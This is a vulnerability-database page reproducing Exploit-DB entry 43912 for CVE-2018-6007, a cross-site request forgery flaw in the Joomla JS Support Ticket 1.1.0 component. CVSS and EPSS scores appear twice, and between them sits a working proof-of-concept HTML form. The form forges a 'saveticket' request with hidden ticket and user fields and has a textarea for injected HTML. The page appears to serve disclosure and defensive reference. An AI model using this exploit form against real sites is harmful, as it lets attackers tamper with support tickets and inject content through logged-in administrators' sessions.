Lucene search

Ihsan SencanEDB-ID:43912

HistoryJan 28, 2018 - 12:00 a.m.

Joomla! Component JS Support Ticket 1.1.0 - Cross-Site Request Forgery

2018-01-2800:00:00

Ihsan Sencan

www.exploit-db.com

6.8 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

8.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

8.9 High

AI Score

Confidence

High

0.002 Low

EPSS

Percentile

51.9%

JSON

<!--
# # # # #
# Exploit Title: Joomla! Component JS Support Ticket 1.1.0 - Cross-Site Request Forgery
# Dork: N/A
# Date: 27.01.2018
# Vendor Homepage: http://www.joomsky.com/
# Software Link: https://extensions.joomla.org/extensions/extension/clients-a-communities/help-desk/js-support-ticket/
# Software Download: http://joomsky.com/46/download/1.html
# Version: 1.1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-6007
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability implication allows an attacker to inject html code, edit ticket etc..
# 
# Proof of Concept: 
-->

<html>
<body>
 
<form action="http://localhost/[PATH]/index.php" method="POST" enctype="multipart/form-data" name="adminForm" id="adminForm">
<textarea name="message" id="message" cols="60" rows="20" style="width: 550px; height: 300px;">
<p>[CODE]</p>
</textarea><br>
<input type="submit" class="button" name="submit_app" id="submit_app_button" onclick="return validate_form(document.adminForm)" value="Ver Ayari">
<input type="hidden" name="id" id="id" value="1" />
<input type="hidden" name="isoverdue" id="isoverdue" value="0" />
<input type="hidden" name="ticketid" id="ticketid" value="vCP4VTWrwzY" />
<input type="hidden" name="c" id="c" value="ticket" />
<input type="hidden" name="task" id="task" value="saveticket" />
<input type="hidden" name="uid" id="uid" value="521" />
<input type="hidden" name="view" id="view" value="ticket" />
<input type="hidden" name="layout" id="layout" value="formticket" />
<input type="hidden" name="check" id="check" value="" />
<input type="hidden" name="option" id="option" value="com_jssupportticket" />
<input type="hidden" name="created" id="created" value="2018-01-27 11:46:58"/>
<input type="hidden" name="update" id="update" value=""/>
</form>

</body>
</html>

6.8 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

8.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

8.9 High

AI Score

Confidence

High

0.002 Low

EPSS

Percentile

51.9%

JSON

Related for EDB-ID:43912